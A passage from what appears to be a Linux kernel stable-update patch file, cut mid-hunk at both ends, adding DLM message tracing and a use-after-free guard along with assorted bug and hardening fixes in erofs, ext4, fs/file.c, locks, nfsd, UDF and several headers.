+@@ -194,7 +195,7 @@ struct midcomms_node {
+ };
+ 
+ struct dlm_mhandle {
+-	const struct dlm_header *inner_hd;
++	const union dlm_packet *inner_p;
+ 	struct midcomms_node *node;
+ 	struct dlm_opts *opts;
+ 	struct dlm_msg *msg;
+@@ -405,6 +406,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
++	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 	mh->ack_rcv = ack_rcv;
+ 
+ 	m_header = (struct dlm_header *)ppc;
+@@ -415,8 +417,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	m_header->h_cmd = DLM_FIN;
+ 
+ 	pr_debug("sending fin msg to node %d\n", node->nodeid);
+-	dlm_midcomms_commit_mhandle(mh);
+-	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ 
+ 	return 0;
+ }
+@@ -468,12 +469,26 @@ static void dlm_pas_fin_ack_rcv(struct midcomms_node *node)
+ 		spin_unlock(&node->state_lock);
+ 		log_print("%s: unexpected state: %d\n",
+ 			  __func__, node->state);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		return;
+ 	}
+ 	spin_unlock(&node->state_lock);
+ }
+ 
++static void dlm_receive_buffer_3_2_trace(uint32_t seq, union dlm_packet *p)
++{
++	switch (p->header.h_cmd) {
++	case DLM_MSG:
++		trace_dlm_recv_message(seq, &p->message);
++		break;
++	case DLM_RCOM:
++		trace_dlm_recv_rcom(seq, &p->rcom);
++		break;
++	default:
++		break;
++	}
++}
++
+ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					struct midcomms_node *node,
+ 					uint32_t seq)
+@@ -527,13 +542,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				spin_unlock(&node->state_lock);
+ 				log_print("%s: unexpected state: %d\n",
+ 					  __func__, node->state);
+-				WARN_ON(1);
++				WARN_ON_ONCE(1);
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+ 			break;
+ 		default:
+-			WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++			WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++			dlm_receive_buffer_3_2_trace(seq, p);
+ 			dlm_receive_buffer(p, node->nodeid);
+ 			set_bit(DLM_NODE_ULP_DELIVERED, &node->flags);
+ 			break;
+@@ -748,7 +764,7 @@ static void dlm_midcomms_receive_buffer_3_2(union dlm_packet *p, int nodeid)
+ 			goto out;
+ 		}
+ 
+-		WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
++		WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+ 		dlm_receive_buffer(p, nodeid);
+ 		break;
+ 	case DLM_OPTS:
+@@ -1049,7 +1065,7 @@ static struct dlm_msg *dlm_midcomms_get_msg_3_2(struct dlm_mhandle *mh, int node
+ 	dlm_fill_opts_header(opts, len, mh->seq);
+ 
+ 	*ppc += sizeof(*opts);
+-	mh->inner_hd = (const struct dlm_header *)*ppc;
++	mh->inner_p = (const union dlm_packet *)*ppc;
+ 	return msg;
+ }
+ 
+@@ -1073,7 +1089,7 @@ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 	}
+ 
+ 	/* this is a bug, however we going on and hope it will be resolved */
+-	WARN_ON(test_bit(DLM_NODE_FLAG_STOP_TX, &node->flags));
++	WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_TX, &node->flags));
+ 
+ 	mh = dlm_allocate_mhandle();
+ 	if (!mh)
+@@ -1105,7 +1121,7 @@ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 		break;
+ 	default:
+ 		dlm_free_mhandle(mh);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		goto err;
+ 	}
+ 
+@@ -1124,11 +1140,30 @@ err:
+ }
+ #endif
+ 
+-static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh)
++static void dlm_midcomms_commit_msg_3_2_trace(const struct dlm_mhandle *mh,
++					      const void *name, int namelen)
++{
++	switch (mh->inner_p->header.h_cmd) {
++	case DLM_MSG:
++		trace_dlm_send_message(mh->seq, &mh->inner_p->message,
++				       name, namelen);
++		break;
++	case DLM_RCOM:
++		trace_dlm_send_rcom(mh->seq, &mh->inner_p->rcom);
++		break;
++	default:
++		/* nothing to trace */
++		break;
++	}
++}
++
++static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh,
++					const void *name, int namelen)
+ {
+ 	/* nexthdr chain for fast lookup */
+-	mh->opts->o_nextcmd = mh->inner_hd->h_cmd;
++	mh->opts->o_nextcmd = mh->inner_p->header.h_cmd;
+ 	mh->committed = true;
++	dlm_midcomms_commit_msg_3_2_trace(mh, name, namelen);
+ 	dlm_lowcomms_commit_msg(mh->msg);
+ }
+ 
+@@ -1136,8 +1171,10 @@ static void dlm_midcomms_commit_msg_3_2(struct dlm_mhandle *mh)
+  * dlm_midcomms_get_mhandle
+  */
+ #ifndef __CHECKER__
+-void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh)
++void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh,
++				 const void *name, int namelen)
+ {
++
+ 	switch (mh->node->version) {
+ 	case DLM_VERSION_3_1:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+@@ -1148,25 +1185,47 @@ void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh)
+ 		dlm_free_mhandle(mh);
+ 		break;
+ 	case DLM_VERSION_3_2:
+-		dlm_midcomms_commit_msg_3_2(mh);
++		/* held rcu read lock here, because we sending the
++		 * dlm message out, when we do that we could receive
++		 * an ack back which releases the mhandle and we
++		 * get a use after free.
++		 */
++		rcu_read_lock();
++		dlm_midcomms_commit_msg_3_2(mh, name, namelen);
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
++		rcu_read_unlock();
+ 		break;
+ 	default:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		break;
+ 	}
+ }
+ #endif
+ 
+ int dlm_midcomms_start(void)
++{
++	return dlm_lowcomms_start();
++}
++
++void dlm_midcomms_stop(void)
++{
++	dlm_lowcomms_stop();
++}
++
++void dlm_midcomms_init(void)
+ {
+ 	int i;
+ 
+ 	for (i = 0; i < CONN_HASH_SIZE; i++)
+ 		INIT_HLIST_HEAD(&node_hash[i]);
+ 
+-	return dlm_lowcomms_start();
++	dlm_lowcomms_init();
++}
++
++void dlm_midcomms_exit(void)
++{
++	dlm_lowcomms_exit();
+ }
+ 
+ static void dlm_act_fin_ack_rcv(struct midcomms_node *node)
+@@ -1195,7 +1254,7 @@ static void dlm_act_fin_ack_rcv(struct midcomms_node *node)
+ 		spin_unlock(&node->state_lock);
+ 		log_print("%s: unexpected state: %d\n",
+ 			  __func__, node->state);
+-		WARN_ON(1);
++		WARN_ON_ONCE(1);
+ 		return;
+ 	}
+ 	spin_unlock(&node->state_lock);
+@@ -1307,7 +1366,8 @@ static void midcomms_node_release(struct rcu_head *rcu)
+ {
+ 	struct midcomms_node *node = container_of(rcu, struct midcomms_node, rcu);
+ 
+-	WARN_ON(atomic_read(&node->send_queue_cnt));
++	WARN_ON_ONCE(atomic_read(&node->send_queue_cnt));
++	dlm_send_queue_flush(node);
+ 	kfree(node);
+ }
+ 
+diff --git a/fs/dlm/midcomms.h b/fs/dlm/midcomms.h
+index 82bcd96619228..69296552d5add 100644
+--- a/fs/dlm/midcomms.h
++++ b/fs/dlm/midcomms.h
+@@ -17,9 +17,13 @@ struct midcomms_node;
+ int dlm_process_incoming_buffer(int nodeid, unsigned char *buf, int buflen);
+ struct dlm_mhandle *dlm_midcomms_get_mhandle(int nodeid, int len,
+ 					     gfp_t allocation, char **ppc);
+-void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh);
++void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh, const void *name,
++				 int namelen);
+ int dlm_midcomms_close(int nodeid);
+ int dlm_midcomms_start(void);
++void dlm_midcomms_stop(void);
++void dlm_midcomms_init(void);
++void dlm_midcomms_exit(void);
+ void dlm_midcomms_shutdown(void);
+ void dlm_midcomms_add_member(int nodeid);
+ void dlm_midcomms_remove_member(int nodeid);
+diff --git a/fs/dlm/rcom.c b/fs/dlm/rcom.c
+index f19860315043a..b76d52e2f6bdd 100644
+--- a/fs/dlm/rcom.c
++++ b/fs/dlm/rcom.c
+@@ -91,7 +91,7 @@ static int create_rcom_stateless(struct dlm_ls *ls, int to_nodeid, int type,
+ 
+ static void send_rcom(struct dlm_mhandle *mh, struct dlm_rcom *rc)
+ {
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ }
+ 
+ static void send_rcom_stateless(struct dlm_msg *msg, struct dlm_rcom *rc)
+@@ -516,7 +516,7 @@ int dlm_send_ls_not_ready(int nodeid, struct dlm_rcom *rc_in)
+ 	rf = (struct rcom_config *) rc->rc_buf;
+ 	rf->rf_lvblen = cpu_to_le32(~0U);
+ 
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+ 
+ 	return 0;
+ }
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 091fd5adf818f..5cd612a8f8584 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -278,7 +278,7 @@ again:
+ 		}
+ 	}
+ 	if (no < nrpages_out && strm->buf.out)
+-		kunmap(rq->in[no]);
++		kunmap(rq->out[no]);
+ 	if (ni < nrpages_in)
+ 		kunmap(rq->in[ni]);
+ 	/* 4. push back LZMA stream context to the global list */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index ee7c88c9b5afa..cf4871834ebb2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1047,12 +1047,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kcalloc(be->nr_pages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(be->nr_pages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kcalloc(pclusterpages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(pclusterpages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1100,7 +1100,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kfree(be->compressed_pages);
++		kvfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1119,7 +1119,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kfree(be->decompressed_pages);
++		kvfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
+diff --git a/fs/ext4/fsmap.c b/fs/ext4/fsmap.c
+index 4493ef0c715e9..cdf9bfe10137f 100644
+--- a/fs/ext4/fsmap.c
++++ b/fs/ext4/fsmap.c
+@@ -486,6 +486,8 @@ static int ext4_getfsmap_datadev(struct super_block *sb,
+ 		keys[0].fmr_physical = bofs;
+ 	if (keys[1].fmr_physical >= eofs)
+ 		keys[1].fmr_physical = eofs - 1;
++	if (keys[1].fmr_physical < keys[0].fmr_physical)
++		return 0;
+ 	start_fsb = keys[0].fmr_physical;
+ 	end_fsb = keys[1].fmr_physical;
+ 
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index a4fbe825694b1..c4475a74c7626 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -159,7 +159,6 @@ int ext4_find_inline_data_nolock(struct inode *inode)
+ 					(void *)ext4_raw_inode(&is.iloc));
+ 		EXT4_I(inode)->i_inline_size = EXT4_MIN_INLINE_DATA_SIZE +
+ 				le32_to_cpu(is.s.here->e_value_size);
+-		ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
+ 	}
+ out:
+ 	brelse(is.iloc.bh);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 283afda26d9cb..34c87fcfd0617 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4727,8 +4727,13 @@ static inline int ext4_iget_extra_inode(struct inode *inode,
+ 
+ 	if (EXT4_INODE_HAS_XATTR_SPACE(inode)  &&
+ 	    *magic == cpu_to_le32(EXT4_XATTR_MAGIC)) {
++		int err;
++
+ 		ext4_set_inode_state(inode, EXT4_STATE_XATTR);
+-		return ext4_find_inline_data_nolock(inode);
++		err = ext4_find_inline_data_nolock(inode);
++		if (!err && ext4_has_inline_data(inode))
++			ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
++		return err;
+ 	} else
+ 		EXT4_I(inode)->i_inline_off = 0;
+ 	return 0;
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8067ccda34e45..8c2b1ff5e6959 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -434,6 +434,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 		ei_bl->i_flags = 0;
+ 		inode_set_iversion(inode_bl, 1);
+ 		i_size_write(inode_bl, 0);
++		EXT4_I(inode_bl)->i_disksize = inode_bl->i_size;
+ 		inode_bl->i_mode = S_IFREG;
+ 		if (ext4_has_feature_extents(sb)) {
+ 			ext4_set_inode_flag(inode_bl, EXT4_INODE_EXTENTS);
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 1c5518a4bdf91..800d631c920b4 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -1595,11 +1595,10 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
+ 		int has_inline_data = 1;
+ 		ret = ext4_find_inline_entry(dir, fname, res_dir,
+ 					     &has_inline_data);
+-		if (has_inline_data) {
+-			if (inlined)
+-				*inlined = 1;
++		if (inlined)
++			*inlined = has_inline_data;
++		if (has_inline_data)
+ 			goto cleanup_and_exit;
+-		}
+ 	}
+ 
+ 	if ((namelen <= 2) && (name[0] == '.') &&
+@@ -3646,7 +3645,8 @@ static void ext4_resetent(handle_t *handle, struct ext4_renament *ent,
+ 	 * so the old->de may no longer valid and need to find it again
+ 	 * before reset old inode info.
+ 	 */
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
+ 	if (IS_ERR(old.bh))
+ 		retval = PTR_ERR(old.bh);
+ 	if (!old.bh)
+@@ -3813,9 +3813,20 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
+-	if (IS_ERR(old.bh))
+-		return PTR_ERR(old.bh);
++	/*
++	 * We need to protect against old.inode directory getting converted
++	 * from inline directory format into a normal one.
++	 */
++	if (S_ISDIR(old.inode->i_mode))
++		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
++
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
++	if (IS_ERR(old.bh)) {
++		retval = PTR_ERR(old.bh);
++		goto unlock_moved_dir;
++	}
++
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+ 	 *  We might rmdir the source, keep it as pwd of some process
+@@ -3873,8 +3884,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval)
++		if (retval) {
++			inode_unlock(old.inode);
+ 			goto end_rename;
++		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+@@ -4010,6 +4023,11 @@ release_bh:
+ 	brelse(old.dir_bh);
+ 	brelse(old.bh);
+ 	brelse(new.bh);
++
++unlock_moved_dir:
++	if (S_ISDIR(old.inode->i_mode))
++		inode_unlock(old.inode);
++
+ 	return retval;
+ }
+ 
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index 97fa7b4c645fd..d0302b66c215d 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -409,7 +409,8 @@ static void io_submit_init_bio(struct ext4_io_submit *io,
+ 
+ static void io_submit_add_bh(struct ext4_io_submit *io,
+ 			     struct inode *inode,
+-			     struct page *page,
++			     struct page *pagecache_page,
++			     struct page *bounce_page,
+ 			     struct buffer_head *bh)
+ {
+ 	int ret;
+@@ -421,10 +422,11 @@ submit_and_retry:
+ 	}
+ 	if (io->io_bio == NULL)
+ 		io_submit_init_bio(io, bh);
+-	ret = bio_add_page(io->io_bio, page, bh->b_size, bh_offset(bh));
++	ret = bio_add_page(io->io_bio, bounce_page ?: pagecache_page,
++			   bh->b_size, bh_offset(bh));
+ 	if (ret != bh->b_size)
+ 		goto submit_and_retry;
+-	wbc_account_cgroup_owner(io->io_wbc, page, bh->b_size);
++	wbc_account_cgroup_owner(io->io_wbc, pagecache_page, bh->b_size);
+ 	io->io_next_block++;
+ }
+ 
+@@ -543,8 +545,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 	do {
+ 		if (!buffer_async_write(bh))
+ 			continue;
+-		io_submit_add_bh(io, inode,
+-				 bounce_page ? bounce_page : page, bh);
++		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 		nr_submitted++;
+ 		clear_buffer_dirty(bh);
+ 	} while ((bh = bh->b_this_page) != head);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 099a87ec9b2ab..e0eb6eb02a834 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2790,6 +2790,9 @@ shift:
+ 			(void *)header, total_ino);
+ 	EXT4_I(inode)->i_extra_isize = new_extra_isize;
+ 
++	if (ext4_has_inline_data(inode))
++		error = ext4_find_inline_data_nolock(inode);
++
+ cleanup:
+ 	if (error && (mnt_count != le16_to_cpu(sbi->s_es->s_mnt_count))) {
+ 		ext4_warning(inode->i_sb, "Unable to expand inode %lu. Delete some EAs or run e2fsck.",
+diff --git a/fs/file.c b/fs/file.c
+index c942c89ca4cda..7893ea161d770 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -642,6 +642,7 @@ static struct file *pick_file(struct files_struct *files, unsigned fd)
+ 	if (fd >= fdt->max_fds)
+ 		return NULL;
+ 
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	file = fdt->fd[fd];
+ 	if (file) {
+ 		rcu_assign_pointer(fdt->fd[fd], NULL);
+diff --git a/fs/locks.c b/fs/locks.c
+index 7dc129cc1a267..240b9309ed6d5 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1862,9 +1862,10 @@ int generic_setlease(struct file *filp, long arg, struct file_lock **flp,
+ 			void **priv)
+ {
+ 	struct inode *inode = locks_inode(filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(file_mnt_user_ns(filp), inode);
+ 	int error;
+ 
+-	if ((!uid_eq(current_fsuid(), inode->i_uid)) && !capable(CAP_LEASE))
++	if ((!vfsuid_eq_kuid(vfsuid, current_fsuid())) && !capable(CAP_LEASE))
+ 		return -EACCES;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EINVAL;
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 0d49c6bb22eb1..59f9a8cee012a 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1037,7 +1037,9 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
++	file_start_write(file);
+ 	host_err = vfs_iter_write(file, &iter, &pos, flags);
++	file_end_write(file);
+ 	if (host_err < 0) {
+ 		nfsd_reset_write_verifier(nn);
+ 		trace_nfsd_writeverf_reset(nn, rqstp, host_err);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index 259152a08852b..a4e875b61f895 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -443,7 +443,7 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 	 * Block beyond EOF and prealloc extents? Just discard preallocation
+ 	 * as it is not useful and complicates things.
+ 	 */
+-	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++	if (((loff_t)block) << inode->i_blkbits >= iinfo->i_lenExtents)
+ 		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 48563dc09e171..0a1ccc68e798a 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -827,6 +827,7 @@ struct hid_driver {
+  * @output_report: send output report to device
+  * @idle: send idle request to device
+  * @may_wakeup: return if device may act as a wakeup source during system-suspend
++ * @max_buffer_size: over-ride maximum data buffer size (default: HID_MAX_BUFFER_SIZE)
+  */
+ struct hid_ll_driver {
+ 	int (*start)(struct hid_device *hdev);
+@@ -852,6 +853,8 @@ struct hid_ll_driver {
+ 
+ 	int (*idle)(struct hid_device *hdev, int report, int idle, int reqtype);
+ 	bool (*may_wakeup)(struct hid_device *hdev);
++
++	unsigned int max_buffer_size;
+ };
+ 
+ extern struct hid_ll_driver i2c_hid_ll_driver;
+diff --git a/include/linux/mhi_ep.h b/include/linux/mhi_ep.h
+index 478aece170462..f198a8ac7ee72 100644
+--- a/include/linux/mhi_ep.h
++++ b/include/linux/mhi_ep.h
+@@ -70,8 +70,8 @@ struct mhi_ep_db_info {
+  * @cmd_ctx_cache_phys: Physical address of the host command context cache
+  * @chdb: Array of channel doorbell interrupt info
+  * @event_lock: Lock for protecting event rings
+- * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @state_lock: Lock for protecting state transitions
++ * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @st_transition_list: List of state transitions
+  * @ch_db_list: List of queued channel doorbells
+  * @wq: Dedicated workqueue for handling rings and state changes
+@@ -117,8 +117,8 @@ struct mhi_ep_cntrl {
+ 
+ 	struct mhi_ep_db_info chdb[4];
+ 	struct mutex event_lock;
++	struct mutex state_lock;
+ 	spinlock_t list_lock;
+-	spinlock_t state_lock;
+ 
+ 	struct list_head st_transition_list;
+ 	struct list_head ch_db_list;
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index bc8f484cdcf3b..45c3d62e616d8 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3094,6 +3094,8 @@
+ 
+ #define PCI_VENDOR_ID_3COM_2		0xa727
+ 
++#define PCI_VENDOR_ID_SOLIDRUN		0xd063
++
+ #define PCI_VENDOR_ID_DIGIUM		0xd161
+ #define PCI_DEVICE_ID_DIGIUM_HFC4S	0xb410
+ 
+diff --git a/include/net/netfilter/nf_tproxy.h b/include/net/netfilter/nf_tproxy.h
+index 82d0e41b76f22..faa108b1ba675 100644
+--- a/include/net/netfilter/nf_tproxy.h
++++ b/include/net/netfilter/nf_tproxy.h
+@@ -17,6 +17,13 @@ static inline bool nf_tproxy_sk_is_transparent(struct sock *sk)
+ 	return false;
+ }
+ 
++static inline void nf_tproxy_twsk_deschedule_put(struct inet_timewait_sock *tw)
++{
++	local_bh_disable();
++	inet_twsk_deschedule_put(tw);
++	local_bh_enable();
++}
++
+ /* assign a socket to the skb -- consumes sk */
+ static inline void nf_tproxy_assign_sock(struct sk_buff *skb, struct sock *sk)
+ {
+diff --git a/include/trace/events/dlm.h b/include/trace/events/dlm.h
+index da0eaae98fa34..4ec47828d55ed 100644
+--- a/include/trace/events/dlm.h
++++ b/include/trace/events/dlm.h
+@@ -46,6 +46,56 @@
+ 	{ DLM_SBF_VALNOTVALID,	"VALNOTVALID" },		\
+ 	{ DLM_SBF_ALTMODE,	"ALTMODE" })
+ 
++#define show_lkb_flags(flags) __print_flags(flags, "|",		\
++	{ DLM_IFL_MSTCPY,	"MSTCPY" },			\
++	{ DLM_IFL_RESEND,	"RESEND" },			\
++	{ DLM_IFL_DEAD,		"DEAD" },			\
++	{ DLM_IFL_OVERLAP_UNLOCK, "OVERLAP_UNLOCK" },		\
++	{ DLM_IFL_OVERLAP_CANCEL, "OVERLAP_CANCEL" },		\
++	{ DLM_IFL_ENDOFLIFE,	"ENDOFLIFE" },			\
++	{ DLM_IFL_DEADLOCK_CANCEL, "DEADLOCK_CANCEL" },		\
++	{ DLM_IFL_STUB_MS,	"STUB_MS" },			\
++	{ DLM_IFL_USER,		"USER" },			\
++	{ DLM_IFL_ORPHAN,	"ORPHAN" })
++
++#define show_header_cmd(cmd) __print_symbolic(cmd,		\
++	{ DLM_MSG,		"MSG"},				\
++	{ DLM_RCOM,		"RCOM"},			\
++	{ DLM_OPTS,		"OPTS"},			\
++	{ DLM_ACK,		"ACK"},				\
++	{ DLM_FIN,		"FIN"})
++
++#define show_message_version(version) __print_symbolic(version,	\
++	{ DLM_VERSION_3_1,	"3.1"},				\
++	{ DLM_VERSION_3_2,	"3.2"})
++
++#define show_message_type(type) __print_symbolic(type,		\
++	{ DLM_MSG_REQUEST,	"REQUEST"},			\
++	{ DLM_MSG_CONVERT,	"CONVERT"},			\
++	{ DLM_MSG_UNLOCK,	"UNLOCK"},			\
++	{ DLM_MSG_CANCEL,	"CANCEL"},			\
++	{ DLM_MSG_REQUEST_REPLY, "REQUEST_REPLY"},		\
++	{ DLM_MSG_CONVERT_REPLY, "CONVERT_REPLY"},		\
++	{ DLM_MSG_UNLOCK_REPLY,	"UNLOCK_REPLY"},		\
++	{ DLM_MSG_CANCEL_REPLY,	"CANCEL_REPLY"},		\
++	{ DLM_MSG_GRANT,	"GRANT"},			\
++	{ DLM_MSG_BAST,		"BAST"},			\
++	{ DLM_MSG_LOOKUP,	"LOOKUP"},			\
++	{ DLM_MSG_REMOVE,	"REMOVE"},			\
++	{ DLM_MSG_LOOKUP_REPLY,	"LOOKUP_REPLY"},		\
++	{ DLM_MSG_PURGE,	"PURGE"})
++
++#define show_rcom_type(type) __print_symbolic(type,            \
++	{ DLM_RCOM_STATUS,              "STATUS"},              \
++	{ DLM_RCOM_NAMES,               "NAMES"},               \
++	{ DLM_RCOM_LOOKUP,              "LOOKUP"},              \
++	{ DLM_RCOM_LOCK,                "LOCK"},                \
++	{ DLM_RCOM_STATUS_REPLY,        "STATUS_REPLY"},        \
++	{ DLM_RCOM_NAMES_REPLY,         "NAMES_REPLY"},         \
++	{ DLM_RCOM_LOOKUP_REPLY,        "LOOKUP_REPLY"},        \
++	{ DLM_RCOM_LOCK_REPLY,          "LOCK_REPLY"})
++
++
+ /* note: we begin tracing dlm_lock_start() only if ls and lkb are found */
+ TRACE_EVENT(dlm_lock_start,
+ 
+@@ -290,6 +340,253 @@ TRACE_EVENT(dlm_unlock_end,
+ 
+ );
+ 
++DECLARE_EVENT_CLASS(dlm_rcom_template,
++
++	TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++
++	TP_ARGS(seq, rc),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, rc_type)
++		__field(int32_t, rc_result)
++		__field(uint64_t, rc_id)
++		__field(uint64_t, rc_seq)
++		__field(uint64_t, rc_seq_reply)
++		__dynamic_array(unsigned char, rc_buf,
++				le16_to_cpu(rc->rc_header.h_length) - sizeof(*rc))
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(rc->rc_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(rc->rc_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(rc->rc_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(rc->rc_header.h_length);
++		__entry->h_cmd = rc->rc_header.h_cmd;
++		__entry->rc_type = le32_to_cpu(rc->rc_type);
++		__entry->rc_result = le32_to_cpu(rc->rc_result);
++		__entry->rc_id = le64_to_cpu(rc->rc_id);
++		__entry->rc_seq = le64_to_cpu(rc->rc_seq);
++		__entry->rc_seq_reply = le64_to_cpu(rc->rc_seq_reply);
++		memcpy(__get_dynamic_array(rc_buf), rc->rc_buf,
++		       __get_dynamic_array_len(rc_buf));
++	),
++
++	TP_printk("seq=%u, h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s rc_type=%s rc_result=%d "
++		  "rc_id=%llu rc_seq=%llu rc_seq_reply=%llu "
++		  "rc_buf=0x%s", __entry->seq,
++		  show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_rcom_type(__entry->rc_type),
